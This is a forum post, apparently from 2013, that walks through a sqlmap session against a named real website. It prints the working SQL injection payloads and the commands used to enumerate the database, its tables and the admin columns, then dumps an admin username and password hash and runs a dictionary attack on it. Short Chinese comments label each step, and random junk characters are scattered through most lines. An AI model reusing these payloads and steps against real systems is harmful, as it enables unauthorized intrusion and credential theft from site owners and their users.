D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db$ r& M9 U6 i) k% |5 c
ms "Mysql" --current-user /* 注解:获取当前用户名称/ Z9 A7 _5 N9 }6 ?3 J
sqlmap/0.9 - automatic SQL injection and database takeover tool! O# Z3 T& _% F: ]; l
http://sqlmap.sourceforge.net starting at: 16:53:54 ^/ |8 F7 M- G. m% n6 `" B
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as4 j; }5 M( d% I1 g' j4 g
session file
3 P; B, O2 D( t6 B+ [[16:53:54] [INFO] resuming injection data from session file
: Z8 ]0 n, @: j( m[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file: U2 p0 b1 \+ i' i& y
[16:53:54] [INFO] testing connection to the target url
; i3 Y! b2 A1 }4 msqlmap identified the following injection points with a total of 0 HTTP(s) reque' ^8 l: `* z. r& e0 a$ n
sts:4 ^0 R3 m1 C( r, B) G
---
' H! d2 c8 c, p7 |/ wPlace: GET! T2 M, Z- C3 G# j0 }4 M
Parameter: id
/ J+ h- g7 b" A: _- T Type: boolean-based blind
6 r9 I2 j4 Y+ w3 c( t) L. L Title: AND boolean-based blind - WHERE or HAVING clause
9 o2 M% G3 E( [ K Payload: id=276 AND 799=799
. L5 Z. J) _5 t' f1 g4 h! V Type: error-based# W W' x$ T& @4 S, \% x
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 n. n; ~- Z3 c$ Z! ]& l. X* w0 X
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,9 f7 D3 e l6 X: T2 e% k( s
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
+ g! G( G" }- t, G) u),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)# ~6 t% F5 \9 C) b
Type: UNION query
8 I- W! Z5 x# Y8 v: F" L$ J4 a8 ~7 { Title: MySQL UNION query (NULL) - 1 to 10 columns
. \0 ?6 w O) h/ j ?3 b$ i Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) D X& d' I6 _% b
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
3 B6 \/ u1 E7 j. E0 A: H, c& J! kCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; e( W* p+ K9 C) L Type: AND/OR time-based blind
# v o$ F0 y ~) p7 [ Title: MySQL > 5.0.11 AND time-based blind
3 t* R- B% Y3 @( ^# O# N2 E- R Payload: id=276 AND SLEEP(5)8 Q6 R ~* z% F. P
---
( E0 G) u( t- H& N2 n[16:53:55] [INFO] the back-end DBMS is MySQL
* q8 g5 F. N( Zweb server operating system: Windows' }3 e: o! h/ f
web application technology: Apache 2.2.11, PHP 5.3.03 s L4 d) ~0 B! N6 h, }
back-end DBMS: MySQL 5.0' `5 N9 Q7 d2 L, R( K
[16:53:55] [INFO] fetching current user; F' E+ s/ }' g; q+ O4 ^. ?
current user: 'root@localhost' 7 ^9 B4 n! t7 F- Z P- k
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
1 w6 N/ h, K; D# otput\www.wepost.com.hk' shutting down at: 16:53:58
/ X+ D _- s) j7 I
$ {8 S5 z/ [2 e9 B8 S- { hD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
3 h- _0 \8 j8 ]) h8 P* |ms "Mysql" --current-db /*当前数据库
- T. `2 N" D2 P sqlmap/0.9 - automatic SQL injection and database takeover tool
! @5 J; |# l& _1 `, K http://sqlmap.sourceforge.net starting at: 16:54:16
4 e7 W% G" {9 J! O$ E. \3 d[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
: d6 X8 @% W& e D4 P session file3 W: j- [& e2 d- T# ~
[16:54:16] [INFO] resuming injection data from session file
$ C$ u/ u- I: W) T[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
$ }# q& h0 r/ [8 a9 \8 a[16:54:16] [INFO] testing connection to the target url, H' _" C0 l1 b6 O u4 Q7 H$ Y
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
. Y; c% Z' ~$ e& q+ _# W2 p. j% W' vsts:0 [' v7 A. z$ p- N8 |: |
---
0 s R; o9 E: X! p, B: O) k# r, ePlace: GET
. ]& b& G O C# ^8 R0 e+ Z. @Parameter: id' d) N B" p, I) T; r
Type: boolean-based blind" r3 H/ E. a8 c: O$ h& w! D
Title: AND boolean-based blind - WHERE or HAVING clause
& z+ V# ?9 Z. C7 L Payload: id=276 AND 799=799 Z& i; E; M% p8 P
Type: error-based
8 I. S- Z6 N0 X5 o Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause7 V% ]& g- b8 V# H; w
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
0 ?* z" c5 m. C3 B120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58) y5 g% m a$ C5 O0 g$ S" _
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
8 s5 ~4 _4 a! R Type: UNION query
/ L. ?4 h" M1 ]. Z9 Z0 t Title: MySQL UNION query (NULL) - 1 to 10 columns# D5 P+ E- ^$ k( x! l# a2 x
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR0 o! F) y2 Z3 Z& \$ w; D& i
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),6 j7 l- [0 T9 Z* ]
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; D5 Z+ q {/ O) ?2 Q5 q Type: AND/OR time-based blind+ o/ Q+ q' E4 ~
Title: MySQL > 5.0.11 AND time-based blind
, }* B& L3 |9 e4 ?# w' Y* u1 O; {$ N Payload: id=276 AND SLEEP(5); M, ^8 g# x2 y$ {
---
' F- t7 S% \( a7 ]) U: p8 M" Z4 h[16:54:17] [INFO] the back-end DBMS is MySQL
3 ]' N- y6 E( S& T3 C- y; g, C8 [3 eweb server operating system: Windows
9 b% V# _& O. N3 nweb application technology: Apache 2.2.11, PHP 5.3.0
# p# |3 ]5 o. S5 D) n+ Yback-end DBMS: MySQL 5.0
9 O1 X# w$ G' y! o; R e5 b! n7 X$ d- Q[16:54:17] [INFO] fetching current database
, v" V6 k6 W& Z* E( N$ |. b* y/ ]current database: 'wepost'
) r4 r$ j/ c9 O/ T2 |+ i R[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
0 x5 I, @, z/ Etput\www.wepost.com.hk' shutting down at: 16:54:18$ O8 u+ F+ ^( j9 c" Z; ~8 O2 k
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
' ]6 P/ z j4 C" {) @$ ams "Mysql" --tables -D "wepost" /*获取当前数据库的表名
; |$ s. d$ {7 I, \4 s3 O; J sqlmap/0.9 - automatic SQL injection and database takeover tool0 A8 \+ S) [' }/ \1 q/ {
http://sqlmap.sourceforge.net starting at: 16:55:25
?4 E3 Y0 {( G' t ^" S; h/ S[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as! q* B v$ B, J; a5 Q/ _; C
session file* f& `. l) a7 s/ L
[16:55:25] [INFO] resuming injection data from session file0 ^/ c% V; V. Y/ ~' c
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file" B' ~ ?0 _& w& D) V+ z
[16:55:25] [INFO] testing connection to the target url# Q9 C+ l" s2 C! r" m: z' H
sqlmap identified the following injection points with a total of 0 HTTP(s) reque" B& r( K! K3 P" T: q+ R
sts:
7 E: Q+ J: p8 }) `0 x& |---
[, x3 p6 g) V3 |9 z' q( O5 vPlace: GET
$ {5 Z5 p, P! O& K1 I4 kParameter: id
7 v- o" I; g2 d$ A6 w Type: boolean-based blind
: \" H- B% a' }( i) d Title: AND boolean-based blind - WHERE or HAVING clause/ q% K4 z5 W( v; @ l* v
Payload: id=276 AND 799=799
) R$ w1 t9 y0 _9 t& {& X Type: error-based1 s) I* W3 p/ |" c8 ?' j2 _
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; \( i+ M6 @; T5 S
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,) P- n, f7 S- @0 `" Z
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
$ l J2 u8 k2 P( Q G- V),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
9 \3 z3 Y3 A" f0 W1 u1 p" t! ~9 l Type: UNION query5 `( r# t7 j& g1 `1 Z! x/ B
Title: MySQL UNION query (NULL) - 1 to 10 columns
( Q( _* }. W! ] s Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
) {1 K7 F: T4 e q4 }(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 D/ |; \9 ]' \1 D* [5 `+ S
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
! E, x0 i' D$ g3 Y Type: AND/OR time-based blind& B4 I( I ~! N/ @$ n7 I
Title: MySQL > 5.0.11 AND time-based blind
+ S# N1 \! h. D2 a* Z$ a$ O Payload: id=276 AND SLEEP(5)9 y: f$ n' U" K1 x" S; a
---
) b" I' Q+ Y8 r# p7 N[16:55:26] [INFO] the back-end DBMS is MySQL1 Q* J. b. `& h3 y: w
web server operating system: Windows
( ?8 S* v0 `4 j- G6 ^. i9 rweb application technology: Apache 2.2.11, PHP 5.3.0
: [# @$ e( Q! P7 _back-end DBMS: MySQL 5.0
; W' U; ]. }6 V, d" W# b[16:55:26] [INFO] fetching tables for database 'wepost'# N4 i$ Q. Z2 [3 Z" l3 m, f0 C
[16:55:27] [INFO] the SQL query used returns 6 entries4 p- |' i6 L3 E/ l) H" x
Database: wepost
- Y0 b: n7 \" O" ?) y[6 tables]9 `( O$ s0 z) C' X6 G/ w
+-------------+) u) y% X0 J6 J F4 D
| admin |
% u0 V- ?. J/ `9 v# |' N, ~' k' G& l| article |/ p: w8 Z0 I- Z, p- a, d- z3 P
| contributor |
$ `' ^+ F+ \1 H: M! D B; S: q| idea |1 P* J a; T) l6 P/ E
| image |
W, T& R1 E. E. J' P| issue |- U- P% [: v; Y; m" x: K8 A
+-------------+7 J% G- T7 X2 [+ i0 M( d9 G/ S
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
3 t1 e2 u5 A4 p% ntput\www.wepost.com.hk' shutting down at: 16:55:33# ~8 e7 E* I8 e) c+ x9 D
& M# v( X3 F% \2 t s
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db" i( W. Q9 H2 K+ R$ y# |; b
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
3 }9 [8 I$ g+ k sqlmap/0.9 - automatic SQL injection and database takeover tool( A1 z7 L) O ]1 e+ c" }- ~
http://sqlmap.sourceforge.net starting at: 16:56:06
0 {/ o- m! K. P3 z5 ssqlmap identified the following injection points with a total of 0 HTTP(s) reque& i: k; Y6 I7 X1 c8 h
sts:: ?& J1 O9 Q8 i
---; [: U/ x, I/ _8 a) O8 l: d. r
Place: GET
# g$ C1 p$ L% }7 m& {3 ^Parameter: id$ W% Y3 v0 A- d" d
Type: boolean-based blind
2 d+ U/ X. }6 K% w# M Z Title: AND boolean-based blind - WHERE or HAVING clause5 X4 A& Y8 r0 C3 G7 c) N
Payload: id=276 AND 799=799
: x- J6 @3 ^/ ?& G/ D! P Type: error-based& q* E6 e1 ~; o! E! G5 ]
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause6 }6 K3 @# _+ J% _! j7 Q, `6 M. H& d
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,. Q2 T" F4 o) O6 ?
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 j A0 O {- V
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
) R/ Q9 H7 p5 ~- G, Z Type: UNION query
6 X! L6 X6 X9 C: k Title: MySQL UNION query (NULL) - 1 to 10 columns
/ [6 M4 T' ~5 S: X: R F Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR9 w% g G; F) C: r4 e' [2 `
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
4 M$ d; E& H. m" g8 bCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#* w$ U1 x1 X j5 s: h; x
Type: AND/OR time-based blind/ f0 K3 O& V. d8 i& R5 c4 q
Title: MySQL > 5.0.11 AND time-based blind; v% U K0 J- z
Payload: id=276 AND SLEEP(5)
# K/ u% m1 [, L' y---
; d1 A% y! h5 P1 }4 ?! dweb server operating system: Windows8 I2 V9 O3 V) x7 n* A
web application technology: Apache 2.2.11, PHP 5.3.03 V' x( J' e+ T
back-end DBMS: MySQL 5.07 ?$ H- V) t+ S
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
& w! x |# Z+ D) F' bssion': wepost, wepost3 `2 N2 w, z9 x) H0 l7 K
Database: wepost: y3 Q/ d9 w8 P$ M# P( h* ]
Table: admin
2 d" q! g/ j7 ?! }" @4 {3 E[4 columns]
9 {& h8 }: y4 Z0 y7 ^: h |1 s+----------+-------------+
5 x! K) q0 F: R* M- `- O8 y| Column | Type |8 u) [7 a" u4 s
+----------+-------------+" m6 Q2 u d, K! l
| id | int(11) |6 z$ M( \( c: F/ h1 z
| password | varchar(32) |
- Z5 [0 k# d. k" w| type | varchar(10) | E. x' V/ F5 B! `% c g' c
| userid | varchar(20) |
5 V7 x* h& Q1 y; G5 m+----------+-------------+. H, l3 d8 _% V8 N/ l
shutting down at: 16:56:192 H) v7 E* s/ }3 V0 ?+ G; p
) y0 A: R( @! z: ZD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
e# P) U% Y; f; G0 E# q- i; fms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容# |. ?7 h* @/ a2 E, Z
sqlmap/0.9 - automatic SQL injection and database takeover tool
( C7 T8 W7 q7 a9 E$ C5 `* G' P* t http://sqlmap.sourceforge.net starting at: 16:57:14* F. E5 }# Y% ]: ?
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
% ~1 Y# V0 B& l, V0 g3 x( Psts:
$ ^1 w/ k( A) l u---
) \ @, m1 @7 p& |Place: GET
7 D E8 D$ w3 Q$ |& J( Q' @" rParameter: id
, p3 c8 I o$ n+ _! W. G; E Type: boolean-based blind
2 _7 S3 }: t1 y e7 L$ H Title: AND boolean-based blind - WHERE or HAVING clause. H8 G+ X7 A. [# o
Payload: id=276 AND 799=7990 U! a5 a0 @/ |7 n n* w. i4 i9 j
Type: error-based
! m! T- k$ j" r! v' X2 C Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause, g, w5 S) s0 I
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
) _) |" c, `% _( O4 Y; R2 k120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
- n% f( E( v# S r8 b+ u+ m, ~% n' Q),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
7 y+ w: q! J: Y# T9 }( G! G Type: UNION query- y+ O! \5 `; N" ~1 L
Title: MySQL UNION query (NULL) - 1 to 10 columns
- T. i2 B; t e4 e8 P- c( E& T" e" d2 m Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
8 s! |2 O% d' @$ E) |(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
, e' i9 g' } }& d* C% qCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
- M- Q8 _2 F7 d; J C' K Type: AND/OR time-based blind D7 l% C0 p$ s6 A5 O( T! E
Title: MySQL > 5.0.11 AND time-based blind
B: g7 h p, P Payload: id=276 AND SLEEP(5)
0 N2 Q# d) j* _) A+ _---
8 G4 C2 c" R" h$ d4 Vweb server operating system: Windows
* c, |. t* g' f! |' |( Z+ Iweb application technology: Apache 2.2.11, PHP 5.3.09 b! P' U# L! @" `
back-end DBMS: MySQL 5.0: f5 z4 Y, [/ o" Z9 y4 w- |
recognized possible password hash values. do you want to use dictionary attack o
! n. \9 i5 }/ |! p# Xn retrieved table items? [Y/n/q] y8 \8 C) n5 f1 w
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
! z1 S5 D( C' a) \2 D+ n* `do you want to use common password suffixes? (slow!) [y/N] y8 J) L% U! c" s+ @: [
Database: wepost
& \9 y, Q; \& x- i9 D! R O% w2 K3 s4 VTable: admin4 ?" A- {6 w& { \ v
[1 entry]
1 A3 D& p/ Q# ] P# a) u+----------------------------------+------------+
* n' @# Q" k' h4 t+ c$ u| password | userid |" T4 N6 H. r+ E1 c* j, {5 T* Z2 Z
+----------------------------------+------------+, _; }, {; q+ x3 Z
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |& b2 Y, f* }# @! W/ z
+----------------------------------+------------+
; V! ]: C) D& x, d( L! M shutting down at: 16:58:14
( y! M' K9 y. @3 b5 V* X+ O8 }3 ]2 b( _ Y5 i
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对